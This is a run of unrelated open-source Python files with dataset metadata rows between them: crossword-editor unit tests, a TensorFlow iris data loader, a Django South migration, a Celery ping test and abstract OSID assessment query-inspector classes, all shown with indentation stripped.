g.set_block(1, 1, True)
g2 = editor.attempt_fill(g, words)
self.assertEqual(g2.count_chars(include_blanks=False), 8)
counts = dict([(g2.data[y][x]["char"], 1) for x, y in g2.cells() if not g2.data[y][x]["block"]])
self.assertEqual(len(counts), 8)
words.reverse()
g3 = editor.attempt_fill(g, words)
self.assertEqual(g2.count_chars(include_blanks=False), 8)
counts = dict([(g2.data[y][x]["char"], 1) for x, y in g3.cells() if not g2.data[y][x]["block"]])
self.assertEqual(len(counts), 8)
cPalabra.postprocess()
def testAttemptFillNoIntersectingAcross(self):
g = Grid(3, 1)
g2 = editor.attempt_fill(g, ["abc"])
self.assertEqual(g2.count_chars(include_blanks=False), 3)
def testAttemptFillNoIntersectingDown(self):
g = Grid(1, 3)
g2 = editor.attempt_fill(g, ["def"])
self.assertEqual(g2.count_chars(include_blanks=False), 3)
def testAttemptFillVoids(self):
g = Grid(3, 3)
g.set_void(0, 0, True)
g.set_void(2, 2, True)
g2 = editor.attempt_fill(g, ["axa", "bxb"])
self.assertEqual(g2.count_chars(include_blanks=False), 5)
def testAttemptFillAlreadyFilledIn(self):
g = Grid(3, 3)
g.set_block(1, 1, True)
g.set_block(2, 2, True)
g.set_char(0, 0, 'A')
g2 = editor.attempt_fill(g, ["aaa"])
self.assertEqual(g2.count_chars(include_blanks=False), 3)
def testAttemptFillVarLengths(self):
g = Grid(5, 5)
for y in xrange(5):
for x in xrange(y, 5):
g.set_block(x, y, True)
g2 = editor.attempt_fill(g, ["aaaa", "bbb", "cc"])
self.assertEqual(g2.count_chars(include_blanks=False), 9)
def testAttemptFillTwo(self):
# A B
# D C
g = Grid(2, 2)
g2 = editor.attempt_fill(g, ["ab", "bc", "dc", "ad"])
self.assertEqual(g2.count_chars(include_blanks=False), 4)
def testAttemptFillNine(self):
# K L M
# N O P
# Q R S
g = Grid(3, 3)
g2 = editor.attempt_fill(g, ["klm", "nop", "qrs", "knq", "lor", "mps"])
self.assertEqual(g2.count_chars(include_blanks=False), 9)
def testOnTypingPeriod(self):
"""If the user types a period then a block is placed and selection is moved."""
actions = editor.on_typing(self.grid, gtk.keysyms.period, (0, 0, "across"))
self.assertEqual(len(actions), 2)
self.assertEqual(actions[0].type, "blocks")
self.assertEqual(actions[0].args, {'x': 0, 'y': 0, 'status': True})
self.assertEqual(actions[1].type, "selection")
self.assertEqual(actions[1].args, {'x': 1, 'y': 0})
def testOnTypingPeriodTwo(self):
"""If the current direction is down then the selected cell moves down."""
actions = editor.on_typing(self.grid, gtk.keysyms.period, (0, 0, "down"))
self.assertEqual(len(actions), 2)
self.assertEqual(actions[1].type, "selection")
self.assertEqual(actions[1].args, {'x': 0, 'y': 1})
def testOnTypingPeriodThree(self):
"""If the user types next to a block, the selection is not moved."""
self.grid.set_block(1, 0, True)
actions = editor.on_typing(self.grid, gtk.keysyms.period, (0, 0, "across"))
self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].type, "blocks")
self.assertEqual(actions[0].args, {'x': 0, 'y': 0, 'status': True})
def testOnTypingChar(self):
"""If the user types a valid character then it is placed and selection is moved."""
actions = editor.on_typing(self.grid, gtk.keysyms.k, (1, 1, "across"))
self.assertEqual(len(actions), 2)
self.assertEqual(actions[0].type, "chars")
self.assertEqual(actions[0].args, {'cells': [(1, 1, 'K')]})
self.assertEqual(actions[1].type, "selection")
self.assertEqual(actions[1].args, {'x': 2, 'y': 1})
def testOnTypingInvalidChar(self):
"""If the user types an invalid character then nothing happens."""
actions = editor.on_typing(self.grid, gtk.keysyms.slash, (5, 5, "down"))
self.assertEqual(actions, [])
def testOnTypingInvalidCell(self):
"""If the user types when no valid cell is selected then nothing happens."""
actions = editor.on_typing(self.grid, gtk.keysyms.a, (-1, -1, "across"))
self.assertEqual(actions, [])
def testOnTypingNotAvailableCell(self):
"""If the user types while an unavailable cell is selected then nothing happens."""
self.grid.set_block(3, 3, True)
actions = editor.on_typing(self.grid, gtk.keysyms.a, (3, 3, "across"))
self.assertEqual(actions, [])
def testOnTypingCharAlreadyThere(self):
"""If the user types a character that is already there then only selection moves."""
self.grid.set_char(5, 5, 'A')
actions = editor.on_typing(self.grid, gtk.keysyms.a, (5, 5, "down"))
self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].type, "selection")
self.assertEqual(actions[0].args, {'x': 5, 'y': 6})
def testOnDeleteNothingThere(self):
"""If the user deletes an empty cell then nothing happens."""
actions = editor.on_delete(self.grid, (0, 0, "across"))
self.assertEqual(actions, [])
def testOnDeleteChar(self):
"""If the user deletes a character then it is removed."""
self.grid.set_char(4, 4, 'P')
actions = editor.on_delete(self.grid, (4, 4, "across"))
self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].type, "chars")
self.assertEqual(actions[0].args, {'cells': [(4, 4, '')]})
def testSelectionDeltaUpRight(self):
"""Applying a selection delta is possible when cell is available."""
actions = editor.apply_selection_delta(self.grid, (3, 3, "across"), 0, -1)
self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].type, "selection")
self.assertEqual(actions[0].args, {'x': 3, 'y': 2})
actions = editor.apply_selection_delta(self.grid, (4, 4, "across"), 1, 0)
self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].type, "selection")
self.assertEqual(actions[0].args, {'x': 5, 'y': 4})
def testSelectionDeltaUpFail(self):
"""Applying a selection delta fails when no cell is available."""
actions = editor.apply_selection_delta(self.grid, (5, 0, "across"), 0, -1)
self.assertEqual(actions, [])
self.grid.set_block(3, 3, True)
actions = editor.apply_selection_delta(self.grid, (3, 4, "across"), 0, -1)
self.assertEqual(actions, [])
def testBackspaceCurrentCell(self):
"""Character is removed from cell when user presses backspace."""
self.grid.set_char(3, 3, 'A')
actions = editor.on_backspace(self.grid, (3, 3, "across"))
self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].type, "chars")
self.assertEqual(actions[0].args, {'cells': [(3, 3, '')]})
def testBackspacePreviousCell(self):
"""Move selection to previous cell on backspace and remove char there."""
self.grid.set_char(3, 3, 'A')
actions = editor.on_backspace(self.grid, (4, 3, "across"))
self.assertEqual(len(actions), 2)
self.assertEqual(actions[0].type, "chars")
self.assertEqual(actions[0].args, {'cells': [(3, 3, '')]})
self.assertEqual(actions[1].type, "selection")
self.assertEqual(actions[1].args, {'x': 3, 'y': 3})
def testInsertWordInvalid(self):
"""A word cannot be inserted when the selected slot is invalid."""
actions = editor.insert(self.grid, (-1, -1, "across"), "australia")
self.assertEqual(actions, [])
def testInsertWordCells(self):
"""A word cannot be inserted when there are no empty cells."""
self.grid.set_block(3, 0, True)
self.grid.set_char(0, 0, 'S')
self.grid.set_char(1, 0, 'P')
self.grid.set_char(2, 0, 'Y')
actions = editor.insert(self.grid, (0, 0, "across"), "spy")
self.assertEqual(actions, [])
def testInsertWordCellsAvailable(self):
"""A word can be inserted when there are empty cells."""
self.grid.set_block(3, 0, True)
self.grid.set_char(0, 0, 'A')
self.grid.set_char(1, 0, 'B')
actions = editor.insert(self.grid, (0, 0, "across"), "abc")
self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].type, "chars")
self.assertEqual(actions[0].args, {'cells': [(2, 0, 'C')]})
def testInsertWordCellsMatch(self):
"""Existing characters don't have to match the inserted word."""
self.grid.set_block(3, 0, True)
self.grid.set_char(0, 0, 'D')
self.grid.set_char(1, 0, 'E')
actions = editor.insert(self.grid, (0, 0, "across"), "abc")
self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].type, "chars")
self.assertEqual(actions[0].args, {'cells': [(2, 0, 'C')]})
def testKeyBackspace(self):
"""Pressing backspace in the editor results at least one action."""
args = self.grid, (5, 5, "across"), gtk.keysyms.BackSpace
actions = editor.determine_editor_actions(*args)
self.assertTrue(actions != [])
def testKeyTab(self):
"""Pressing tab in the editor results in an action when selection is available."""
args = self.grid, (5, 5, "across"), gtk.keysyms.Tab
actions = editor.determine_editor_actions(*args)
self.assertTrue(len(actions), 1)
self.assertEqual(actions[0].type, "swapdir")
args = self.grid, (-1, -1, "across"), gtk.keysyms.Tab
actions = editor.determine_editor_actions(*args)
self.assertEqual(actions, [])
self.grid.set_block(5, 5, True)
args = self.grid, (5, 5, "across"), gtk.keysyms.Tab
actions = editor.determine_editor_actions(*args)
self.assertEqual(actions, [])
def testKeyHome(self):
"""Pressing the Home key has no effect when nothing is selected."""
args = self.grid, (-1, -1, "across"), gtk.keysyms.Home
actions = editor.determine_editor_actions(*args)
self.assertEqual(actions, [])
def testKeyHomeNotAvailable(self):
"""Pressing the Home key has no effect when cell is not available."""
self.grid.set_void(5, 5, True)
args = self.grid, (5, 5, "across"), gtk.keysyms.Home
actions = editor.determine_editor_actions(*args)
self.assertEqual(actions, [])
def testKeyEnd(self):
"""Pressing the End key has no effect when nothing is selected."""
args = self.grid, (-1, -1, "across"), gtk.keysyms.End
actions = editor.determine_editor_actions(*args)
self.assertEqual(actions, [])
def testKeyEndNotAvailable(self):
"""Pressing the End key has no effect when cell is not available."""
self.grid.set_void(5, 5, True)
args = self.grid, (5, 5, "across"), gtk.keysyms.End
actions = editor.determine_editor_actions(*args)
self.assertEqual(actions, [])
def testKeyHomeWorks(self):
"""Pressing the Home key results in a selection action."""
args = self.grid, (5, 5, "across"), gtk.keysyms.Home
actions = editor.determine_editor_actions(*args)
self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].type, "selection")
self.assertEqual(actions[0].args, {'x': 0, 'y': 5})
def testKeyEndWorks(self):
"""Pressing the End key results in a selection action."""
args = self.grid, (5, 5, "across"), gtk.keysyms.End
actions = editor.determine_editor_actions(*args)
self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].type, "selection")
self.assertEqual(actions[0].args, {'x': self.grid.width - 1, 'y': 5})
def testKeyArrow(self):
"""Pressing an arrow key results in a selection action."""
KEYS = [gtk.keysyms.Left, gtk.keysyms.Right, gtk.keysyms.Up, gtk.keysyms.Down]
for key in KEYS:
args = self.grid, (5, 5, "across"), key
actions = editor.determine_editor_actions(*args)
self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].type, "selection")
def testKeyArrowChangeTypingDir(self):
"""When the option is enabled, some arrows keys change typing direction."""
args = self.grid, (5, 5, "down"), gtk.keysyms.Right
actions = editor.determine_editor_actions(*args, arrows_change_dir=True)
self.assertEqual(len(actions), 2)
self.assertEqual(actions[0].type, "selection")
self.assertEqual(actions[1].type, "swapdir")
args = self.grid, (5, 5, "across"), gtk.keysyms.Down
actions = editor.determine_editor_actions(*args, arrows_change_dir=True)
self.assertEqual(len(actions), 2)
self.assertEqual(actions[0].type, "selection")
self.assertEqual(actions[1].type, "swapdir")
def testKeyArrowsChangeTypingDirNot(self):
"""
The left and up arrows keys are unaffected by the arrows_change_dir option.
"""
for key in [gtk.keysyms.Left, gtk.keysyms.Up]:
for d in ["across", "down"]:
args = self.grid, (5, 5, d), key
actions = editor.determine_editor_actions(*args, arrows_change_dir=True)
self.assertEqual(len(actions), 1)
def testKeyDelete(self):
"""Pressing the delete key results in a char deletion."""
self.grid.set_char(5, 5, 'A')
args = self.grid, (5, 5, "across"), gtk.keysyms.Delete
actions = editor.determine_editor_actions(*args)
self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].type, "chars")
self.assertEqual(actions[0].args, {'cells': [(5, 5, '')]})
def testKeyOthers(self):
"""Pressing other keys may or may not have an action as result."""
args = self.grid, (5, 5, "across"), gtk.keysyms.c
actions = editor.determine_editor_actions(*args)
self.assertEqual(len(actions), 2)
args = self.grid, (5, 5, "across"), gtk.keysyms.equal
actions = editor.determine_editor_actions(*args)
self.assertEqual(actions, [])
def testUserMovesMouse(self):
"""When the user moves the mouse, the current and previous cells are rendered."""
p = Puzzle(Grid(15, 15))
symms = [constants.SYM_HORIZONTAL]
previous = (1, 1)
current = (0, 0)
shift_down = False
mouse_buttons_down = [False, False, False]
result = editor.compute_motion_actions(p, symms, previous, current
, shift_down, mouse_buttons_down)
self.assertEqual(len(result), 1)
self.assertEqual(result[0].type, 'render')
self.assertTrue((0, 0) in result[0].args['cells'])
self.assertTrue((0, 14) in result[0].args['cells'])
self.assertTrue((1, 1) in result[0].args['cells'])
self.assertTrue((1, 13) in result[0].args['cells'])
def testUserPressesShiftAndClicks(self):
"""The user can place a block with shift + left click."""
p = Puzzle(Grid(15, 15))
symms = []
previous = (0, 0)
current = (0, 0)
shift_down = True
mouse_buttons_down = [True, False, False]
result = editor.compute_motion_actions(p, symms, previous, current
, shift_down, mouse_buttons_down)
self.assertEqual(len(result), 1)
self.assertEqual(result[0].type, 'blocks')
self.assertEqual(result[0].args['x'], 0)
self.assertEqual(result[0].args['y'], 0)
self.assertEqual(result[0].args['status'], True)
def testUserPressesShiftAndRightClicks(self):
"""The user can remove a block with shift + right click."""
p = Puzzle(Grid(15, 15))
symms = []
previous = (0, 0)
current = (0, 0)
shift_down = True
mouse_buttons_down = [False, False, True]
result = editor.compute_motion_actions(p, symms, previous, current
, shift_down, mouse_buttons_down)
self.assertEqual(len(result), 1)
self.assertEqual(result[0].type, 'blocks')
self.assertEqual(result[0].args['x'], 0)
self.assertEqual(result[0].args['y'], 0)
self.assertEqual(result[0].args['status'], False)
def testShiftAndBothMouseButtons(self):
"""Holding shift and pressing both mouse buttons does nothing."""
p = Puzzle(Grid(15, 15))
symms = []
previous = (0, 0)
current = (0, 0)
shift_down = True
mouse_buttons_down = [True, False, True]
result = editor.compute_motion_actions(p, symms, previous, current
, shift_down, mouse_buttons_down)
self.assertEqual(result, [])
def testProcessEditorActionsBlocks(self):
"""
When processing a blocks action in the editor,
transform_grid of the window gets called.
"""
window = EditorMockWindow()
a = editor.EditorAction('blocks', {'x': 3, 'y': 3, 'status': True})
editor.process_editor_actions(window, self.puzzle, self.e_settings, [a])
self.assertEqual(window.called, 1)
def testProcessEditorActionsBlocksTwo(self):
"""If a blocks action takes place on an invalid cell, nothing happens."""
window = EditorMockWindow()
a = editor.EditorAction('blocks', {'x': -1, 'y': -1, 'status': True})
editor.process_editor_actions(window, self.puzzle, self.e_settings, [a])
self.assertEqual(window.called, 0)
def testProcessEditorActionsChars(self):
"""
When processing a chars action in the editor,
transform_grid of the window gets called.
"""
window = EditorMockWindow()
a = editor.EditorAction('chars', {'cells': [(3, 3, 'A')]})
editor.process_editor_actions(window, self.puzzle, self.e_settings, [a])
self.assertEqual(window.called, 1)
def testLockedGrid(self):
"""When the grid is locked, no actions can modify the grid."""
window = EditorMockWindow()
self.e_settings.settings["locked_grid"] = True
a1 = editor.EditorAction('blocks', {'x': 3, 'y': 3, 'status': True})
editor.process_editor_actions(window, self.puzzle, self.e_settings, [a1])
self.assertEqual(window.called, 0)
a2 = editor.EditorAction('chars', {'cells': [(3, 3, 'A')]})
editor.process_editor_actions(window, self.puzzle, self.e_settings, [a2])
self.assertEqual(window.called, 0)
def testComputeWordsForDisplay(self):
"""Each word is presented together with score and intersection boolean."""
wlist = word.CWordList(["abcde", "bcdef"])
words = editor.compute_words(Grid(5, 5), [wlist], self.e_settings.selection)
self.assertTrue(("abcde", 0, False) in words)
self.assertTrue(("bcdef", 0, False) in words)
cPalabra.postprocess()
def testComputeWordsForDisplayLengthOne(self):
"""When words are queried for a slot of length 1 then no words are returned."""
g = Grid(3, 3)
g.set_block(1, 0, True)
wlist = word.CWordList(["aaa", "bbb", "ccc"])
words = editor.compute_words(g, [wlist], self.e_settings.selection)
self.assertEqual(words, [])
cPalabra.postprocess()
def testComputeWordsForDisplayInvalidCell(self):
"""When words are queried for an unavailable cell, no words are returned."""
g = Grid(3, 3)
g.set_block(1, 0, True)
wlist = word.CWordList(["aaa", "bbb", "ccc"])
self.e_settings.selection = editor.Selection(1, 0, "across")
words = editor.compute_words(g, [wlist], self.e_settings.selection)
self.assertEqual(words, [])
cPalabra.postprocess()
def testClearSlotOf(self):
"""Clearing a slot clears all characters in that slot."""
g = Grid(3, 3)
CELLS = [(0, 0), (1, 0), (2, 0)]
for x, y in CELLS:
g.set_char(x, y, 'A')
window = EditorMockWindow()
editor.clear_slot_of(window, g, 1, 0, "across")
self.assertEqual(window.called, 1)
for cell in CELLS:
self.assertTrue(g.get_char(*cell), '')
def testClearSlotOfNothingToClear(self):
"""
When there are no characters to remove, transform_grid is not called.
"""
g = Grid(3, 3)
window = EditorMockWindow()
editor.clear_slot_of(window, g, 1, 0, "down")
self.assertEqual(window.called, 0)
def testSlotClearable(self):
"""A slot is clearable if it has chars and it is part of a word."""
g = Grid(3, 3)
g.set_block(1, 0, True)
self.assertEqual(editor.clearable(g, (0, 0, "across")), False)
self.assertEqual(editor.clearable(g, (0, 1, "across")), False)
g.set_char(0, 2, 'A')
self.assertEqual(editor.clearable(g, (1, 2, "across")), True)
# TODO: if user clicks an invalid cell, selection dir must be reset to across
# TODO: if new puzzle is opened, editor settings should be reset
| gpl-3.0 | -653,624,900,040,475,500 | 42.544233 | 108 | 0.60252 | false |
motkeg/Deep-learning | examples/estimator-example-iris/iris_data.py | 4 | 2863 | import pandas as pd
import tensorflow as tf
TRAIN_URL = "http://download.tensorflow.org/data/iris_training.csv"
TEST_URL = "http://download.tensorflow.org/data/iris_test.csv"
CSV_COLUMN_NAMES = ['SepalLength', 'SepalWidth',
'PetalLength', 'PetalWidth', 'Species']
SPECIES = ['Setosa', 'Versicolor', 'Virginica']
def maybe_download():
train_path = tf.keras.utils.get_file(TRAIN_URL.split('/')[-1], TRAIN_URL)
test_path = tf.keras.utils.get_file(TEST_URL.split('/')[-1], TEST_URL)
return train_path, test_path
def load_data(y_name='Species'):
"""Returns the iris dataset as (train_x, train_y), (test_x, test_y)."""
train_path, test_path = maybe_download()
train = pd.read_csv(train_path, names=CSV_COLUMN_NAMES, header=0)
train_x, train_y = train, train.pop(y_name)
test = pd.read_csv(test_path, names=CSV_COLUMN_NAMES, header=0)
test_x, test_y = test, test.pop(y_name)
return (train_x, train_y), (test_x, test_y)
def train_input_fn(features, labels, batch_size):
"""An input function for training"""
# Convert the inputs to a Dataset.
dataset = tf.data.Dataset.from_tensor_slices((dict(features), labels))
# Shuffle, repeat, and batch the examples.
dataset = dataset.shuffle(1000).repeat().batch(batch_size)
# Return the dataset.
return dataset
def eval_input_fn(features, labels, batch_size):
"""An input function for evaluation or prediction"""
features=dict(features)
if labels is None:
# No labels, use only features.
inputs = features
else:
inputs = (features, labels)
# Convert the inputs to a Dataset.
dataset = tf.data.Dataset.from_tensor_slices(inputs)
# Batch the examples
assert batch_size is not None, "batch_size must not be None"
dataset = dataset.batch(batch_size)
# Return the dataset.
return dataset
# The remainder of this file contains a simple example of a csv parser,
# implemented using a the `Dataset` class.
# `tf.parse_csv` sets the types of the outputs to match the examples given in
# the `record_defaults` argument.
CSV_TYPES = [[0.0], [0.0], [0.0], [0.0], [0]]
def _parse_line(line):
# Decode the line into its fields
fields = tf.decode_csv(line, record_defaults=CSV_TYPES)
# Pack the result into a dictionary
features = dict(zip(CSV_COLUMN_NAMES, fields))
# Separate the label from the features
label = features.pop('Species')
return features, label
def csv_input_fn(csv_path, batch_size):
# Create a dataset containing the text lines.
dataset = tf.data.TextLineDataset(csv_path).skip(1)
# Parse each line.
dataset = dataset.map(_parse_line)
# Shuffle, repeat, and batch the examples.
dataset = dataset.shuffle(1000).repeat().batch(batch_size)
# Return the dataset.
return dataset
| apache-2.0 | -7,948,249,070,987,107,000 | 29.784946 | 77 | 0.66818 | false |
opencorato/write-it | contactos/migrations/0003_auto__add_field_contact_owner.py | 2 | 5781 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Contact.owner'
db.add_column(u'contactos_contact', 'owner',
self.gf('django.db.models.fields.related.ForeignKey')(default=1, to=orm['auth.User']),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Contact.owner'
db.delete_column(u'contactos_contact', 'owner_id')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contactos.contact': {
'Meta': {'object_name': 'Contact'},
'contact_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contactos.ContactType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_bounced': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['popit.Person']"}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '512'})
},
u'contactos.contacttype': {
'Meta': {'object_name': 'ContactType'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'popit.apiinstance': {
'Meta': {'object_name': 'ApiInstance'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'url': ('popit.fields.ApiInstanceURLField', [], {'unique': 'True', 'max_length': '200'})
},
u'popit.person': {
'Meta': {'object_name': 'Person'},
'api_instance': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['popit.ApiInstance']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'popit_url': ('popit.fields.PopItURLField', [], {'default': "''", 'max_length': '200', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'summary': ('django.db.models.fields.TextField', [], {'blank': 'True'})
}
}
complete_apps = ['contactos'] | gpl-3.0 | 5,110,749,738,202,768,000 | 63.244444 | 187 | 0.547829 | false |
EDUlib/edx-platform | openedx/core/djangoapps/service_status/test.py | 4 | 1342 | """Test for async task service status"""
import json
import unittest
from django.test.client import Client
from django.urls import reverse
class CeleryConfigTest(unittest.TestCase):
"""
Test that we can get a response from Celery
"""
def setUp(self):
"""
Create a django test client
"""
super().setUp()
self.client = Client()
self.ping_url = reverse('status.service.celery.ping')
def test_ping(self):
"""
Try to ping celery.
"""
# Access the service status page, which starts a delayed
# asynchronous task
response = self.client.get(self.ping_url)
# HTTP response should be successful
assert response.status_code == 200
# Expect to get a JSON-serialized dict with
# task and time information
result_dict = json.loads(response.content.decode('utf-8'))
# Was it successful?
assert result_dict['success']
# We should get a "pong" message back
assert result_dict['value'] == 'pong'
# We don't know the other dict values exactly,
# but we can assert that they take the right form
assert isinstance(result_dict['task_id'], str)
assert isinstance(result_dict['time'], float)
assert result_dict['time'] > 0.0
| agpl-3.0 | -7,473,054,767,539,127,000 | 25.84 | 66 | 0.611773 | false |
mitsei/dlkit | dlkit/abstract_osid/assessment/query_inspectors.py | 1 | 37418 | """Implementations of assessment abstract base class query_inspectors."""
# pylint: disable=invalid-name
# Method names comply with OSID specification.
# pylint: disable=no-init
# Abstract classes do not define __init__.
# pylint: disable=too-few-public-methods
# Some interfaces are specified as 'markers' and include no methods.
# pylint: disable=too-many-public-methods
# Number of methods are defined in specification
# pylint: disable=too-many-ancestors
# Inheritance defined in specification
# pylint: disable=too-many-arguments
# Argument signature defined in specification.
# pylint: disable=duplicate-code
# All apparent duplicates have been inspected. They aren't.
import abc
class QuestionQueryInspector:
"""The query inspectors provide a means of accessing the match terms of a query.
These interfaces are used to examine the actual query terms used in
a search or that may be used to create a smart catalog. Query
inspectors may be converted to ``OsidQuery`` interfaces for reuse or
modification in the search sessions.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_question_query_inspector_record(self, question_record_type):
"""Gets the record query inspector corresponding to the given ``Question`` record ``Type``.
:param question_record_type: a question record type
:type question_record_type: ``osid.type.Type``
:return: the question query inspector record
:rtype: ``osid.assessment.records.QuestionQueryInspectorRecord``
:raise: ``NullArgument`` -- ``question_record_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unsupported`` -- ``has_record_type(question_record_type)`` is ``false``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.records.QuestionQueryInspectorRecord
class AnswerQueryInspector:
"""The query inspectors provide a means of accessing the match terms of a query.
These interfaces are used to examine the actual query terms used in
a search or that may be used to create a smart catalog. Query
inspectors may be converted to ``OsidQuery`` interfaces for reuse or
modification in the search sessions.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_answer_query_inspector_record(self, question_record_type):
"""Gets the record query inspector corresponding to the given ``Question`` record ``Type``.
:param question_record_type: a question record type
:type question_record_type: ``osid.type.Type``
:return: the answer query inspector record
:rtype: ``osid.assessment.records.AnswerQueryInspectorRecord``
:raise: ``NullArgument`` -- ``question_record_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unsupported`` -- ``has_record_type(question_record_type)`` is ``false``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.records.AnswerQueryInspectorRecord
class ItemQueryInspector:
"""The query inspectors provide a means of accessing the match terms of a query.
These interfaces are used to examine the actual query terms used in
a search or that may be used to create a smart catalog. Query
inspectors may be converted to ``OsidQuery`` interfaces for reuse or
modification in the search sessions.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_learning_objective_id_terms(self):
"""Gets the learning objective ``Id`` query terms.
:return: the learning objective ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
learning_objective_id_terms = property(fget=get_learning_objective_id_terms)
@abc.abstractmethod
def get_learning_objective_terms(self):
"""Gets the learning objective query terms.
:return: the learning objective terms
:rtype: ``osid.learning.ObjectiveQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.learning.ObjectiveQueryInspector
learning_objective_terms = property(fget=get_learning_objective_terms)
@abc.abstractmethod
def get_question_id_terms(self):
"""Gets the question ``Id`` query terms.
:return: the question ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
question_id_terms = property(fget=get_question_id_terms)
@abc.abstractmethod
def get_question_terms(self):
"""Gets the question query terms.
:return: the question terms
:rtype: ``osid.assessment.QuestionQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.QuestionQueryInspector
question_terms = property(fget=get_question_terms)
@abc.abstractmethod
def get_answer_id_terms(self):
"""Gets the answer ``Id`` query terms.
:return: the answer ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
answer_id_terms = property(fget=get_answer_id_terms)
@abc.abstractmethod
def get_answer_terms(self):
"""Gets the answer query terms.
:return: the answer terms
:rtype: ``osid.assessment.AnswerQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.AnswerQueryInspector
answer_terms = property(fget=get_answer_terms)
@abc.abstractmethod
def get_assessment_id_terms(self):
"""Gets the assessment ``Id`` query terms.
:return: the assessment ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
assessment_id_terms = property(fget=get_assessment_id_terms)
@abc.abstractmethod
def get_assessment_terms(self):
"""Gets the assessment query terms.
:return: the assessment terms
:rtype: ``osid.assessment.AssessmentQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.AssessmentQueryInspector
